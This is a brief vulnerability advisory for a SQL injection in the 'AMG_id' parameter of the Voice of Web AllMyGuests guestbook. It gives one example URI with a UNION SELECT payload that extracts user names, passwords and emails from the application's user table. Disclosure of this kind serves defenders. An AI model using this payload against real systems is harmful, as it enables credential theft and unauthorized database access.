Voice of Web AllMyGuests 'AMG_id' SQL Injection Vulnerability

Voice of Web AllMyGuests 'AMG_id' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--